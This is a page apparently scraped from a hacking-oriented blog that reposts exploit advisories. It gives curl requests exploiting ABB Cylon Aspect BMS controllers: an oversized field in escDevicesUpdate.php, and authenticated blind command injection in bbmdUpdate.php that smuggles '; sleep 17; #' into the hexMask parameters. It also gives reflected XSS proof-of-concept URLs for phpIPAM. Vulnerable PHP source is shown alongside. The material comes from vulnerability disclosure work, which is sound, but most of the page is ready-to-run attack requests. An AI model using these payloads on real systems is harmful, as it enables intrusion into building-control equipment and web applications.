https://www.cve.org/CVERecord?id=CVE-2024-48844 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/escDevicesUpdate.php \ > -H "Cookie: PHPSESSID=xxx" \ > -d "rowCount=2511531337&\ > escid1=192.168.1.1&\ > remove1=0&\ > escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\ > remove2=0&\ > etc. > etc. $ cat escDevicesUpdate.php ... ... $ini = INI::read($comproperties); unset($ini['comm']['esc-ip-addr']); $rowCount = $_POST['rowCount']; for ($i = 1; $i < $rowCount; $i++) { $fieldEscid = "escid" . $i; $fieldRemove = "remove" . $i; if ($_POST[$fieldRemove] != 1) { $escid = trim($_POST[$fieldEscid]); $ini['comm']['esc-ip-addr'][$i] = $escid; } } if (!INI::write($comproperties, $ini)) { logWarning("ESC device listt modification FAILED"); $myLine = __LINE__; errorCall($myLine); } ...
  24. HireHackking

    ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated blind command injection vulnerability. Input passed to several POST parameters is not properly sanitized when writing files, allowing attackers to execute arbitrary shell commands on the system. There is also an off-by-one error in array access that could lead to undefined behavior and potential DoS. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5903 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550 CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/bbmdUpdate.php \ > -H "Cookie: PHPSESSID=xxx" \ > -d "rowCount=2&\ > ip1=192.168.1.1&\ > port1=47808&\ > hexMask1=0xFFFF&\ > remove1=0&\ > ip2=192.168.1.2&\ > port2=47809&\ > hexMask2=0xFFFF; sleep 17; #&\ > remove2=0&\ > submit=Submit $ curl http://192.168.73.31/bbmdUpdate.php \ > -H "Cookie: PHPSESSID=xxx" \ > -d "rowCountNAT=2&\ > NATip1=192.168.1.1&\ > NATport1=2222&\ > NAThexMask1=0xFFFF&\ > NATremove1=7&\ > NATip2=192.168.1.2&\ > NATport2=2223&\ > NAThexMask2=0xFFFF; sleep 17; #&\ > NATremove2=0&\ > submit=Submit
  25. HireHackking

    phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam # Software Link: https://github.com/phpipam/phpipam # Version: 1.5.1 # Tested on: Ubuntu Windows # CVE : CVE-2023-24657 PoC: 1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22 "Sink": "print @$_REQUEST['closeClass']", "Vulnerable Variable": "closeClass", "Source": "$_REQUEST['closeClass']", "Sanitization Mechanisms Before Patch": "None", "Sink Context Constraints": "Reflected within HTML attributes without escaping", "Attack Payload": "\" onclick=\"alert(1)\"", "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification", "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22", "Request Method": "GET", "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22" [Replace Your Domain Name]